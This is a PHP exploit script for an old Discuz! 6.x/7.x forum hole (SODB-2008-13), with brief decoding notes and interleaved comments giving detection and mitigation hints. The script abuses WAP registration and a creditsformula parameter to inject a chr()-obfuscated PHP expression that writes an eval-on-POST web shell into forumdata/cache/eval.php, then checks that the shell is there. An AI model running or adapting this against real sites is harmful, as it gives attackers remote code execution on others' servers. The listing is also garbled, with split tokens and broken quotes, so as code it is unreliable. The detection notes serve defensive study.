<? php /* * Discuz! 6. x/7. x SODB-2 0 0 8-1 3 Exp * By www.80vul.com * Notes the value of the variable, add your own modifications / $host = ‘www.80vul.com’; // Server domain or IP $path = ‘/discuz/’; // Where the program path $key = 0; // The above variable is edited, make will the value here to 1
// NOTE(review): this listing is extraction-garbled (typographic quotes, split tokens such as "$ key" and
// "chr(4 6)", a header comment whose terminator was lost) and is kept byte-for-byte; it does not parse as shown.
// The header names the target as Discuz! 6.x/7.x and the advisory as SODB-2008-13. $host and $path select
// the forum; $key is a manual arming switch that the next line checks.
if (strpos($host, ‘://’) !== false || strpos($path, ‘/’) === false || $key !== 1) exit(”a professional point well,the first look inside the comments -,-\n”);
// Guard: the script exits unless $host carries no "://", $path contains "/", and $key was set to 1.
error_reporting(7); ini_set(’max_execution_time’, 0);
// error_reporting(7) limits reporting to errors, warnings and parse errors; max_execution_time 0 removes the time limit.
$key = time(); $cmd = ‘action=register&username=’.$ key.’& amp;password=’.$ key.’& amp;email=’.$ key.’@ 80vul. com&_DCACHE=1'; $resp = send();
// Request 1 (sent through send(), i.e. to wap/index.php): a registration whose username, password and
// e-mail local part are all the current Unix timestamp, with an extra _DCACHE=1 field appended.
// Detection: registrations of this shape on the WAP endpoint, and any client-supplied _DCACHE parameter,
// are high-signal entries in web-server or WAF logs.
// NOTE(review): presumably _DCACHE overrides an application-internal variable; the page does not show the
// vulnerable server code, so confirm against the advisory.
preg_match(’/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/’, $resp, $sid);
if (!$ sid) exit(”Oh,is probably not turned on the WAP registration. -,- \n”);
// The 6-character session id is taken from the logout link in the response. The exit message attributes a
// missing match to WAP registration being off, so disabling WAP registration closes this path.
$cmd = ’stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid=’.$ sid[1].’& amp;creditsformula=${${fputs(fopen(chr(4 6). chr(4 6). chr(4 7). chr(1 0 2). chr(1 1 1). chr(1 1 4). chr(1 1 7). chr(1 0 9). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2),chr(1 1 9). chr(4 3)),chr(6 0). chr(6 3). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(9 9). chr(9 3). chr(4 1). chr(6 3). chr(6 2). chr(5 6). chr(4 8). chr(1 1 8). chr(1 1 7). chr(1 0 8))}}’; send();
// Request 2: posts stylejump/styleid/inajax/transsidstatus, the harvested sid, and a creditsformula value
// that is a ${${...}} PHP expression written entirely as chr() calls. The notes at the end of this page give
// the decoded form: a write to forumdata/cache/eval.php of an eval-on-POST stub followed by the marker "80vul".
// Detection: a creditsformula request parameter containing "${", fputs/fopen, or long chr( chains.
// Mitigation: move to a vendor-fixed release (version not stated on this page), make sure request
// parameters cannot overwrite internal variables, and deny PHP execution under forumdata/cache/.
$shell = ‘http://’.$ host.$ path.’forumdata/cache/eval.php’;
if (file_get_contents($shell) == ‘80vul’) exit(”well,go and see your WebShell.:\t$shell\n inside the code is:\t<? eval(\$_POST[c])?& gt;\n don't tell me you don't use -,-\n”); else exit(”well,is probably the site does not exist vulnerability,for one. -,- \n”);
// Verification step: fetches forumdata/cache/eval.php and compares the body with '80vul'.
// Incident response: the existence of that file, a response body of exactly "80vul", or POSTs to it
// carrying a parameter named c indicate that the write succeeded on the host.
// send(): builds a raw HTTP/1.1 POST to {$path}wap/index.php with $cmd as the body, writes it over a plain
// TCP connection to $host on port 80, and returns the full response text (headers and body).
// Inputs come from the globals $host, $path and $cmd; $url is declared global but not used in the visible lines.
// Detection: the request carries fixed headers — User-Agent "Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1",
// Accept-Language zh-cn, a Referer equal to the forum base URL, Connection: Close. These are easy to change,
// so treat them as supporting evidence next to the parameter names in the body, not as a signature by themselves.
// NOTE(review): the fsockopen() result is not checked before fputs(); only the read loop tests $fp.
function send() { global $host, $path, $url, $cmd;
$data = “POST “.$ path.”wap/index.php HTTP/1.1\r\n”; $data .= “Accept: /\r\n”; $data .= “Accept-Language: zh-cn\r\n”; $data .= “Referer: http://$host$path\r\n”; $data .= “Content-Type: application/x-www-form-urlencoded\r\n”; $data .= “User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n”; $data .= “Host: $host\r\n”; $data .= “Connection: Close\r\n”; $data .= “Content-Length: “. strlen($cmd).”\ r\n\r\n”; $data .= $cmd;
$fp = fsockopen($host, 8 0); fputs($fp, $data);
$resp = ”;
// Reads the response in 1024-byte chunks until end of stream.
while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);
return $resp; }
?& gt;
A very powerful hole — by that I mean the way the vulnerability arises... As for how effective it is in practice, I won't say; WAP has to be turned on :)
DZ! SODB-2008-13 EXP: brief notes
The chr() sequence decodes to: fopen(../forumdata/cache/eval.php, w+), with <? eval($_POST[c])?>80vul as the content written. Each character was produced with Wscript.echo chr(xx), and the results were then joined with &.
The file_get_contents function reads the contents of the file (what is displayed on the page, not the source code). The script checks whether the result is 80vul; if it is, the attempt succeeded.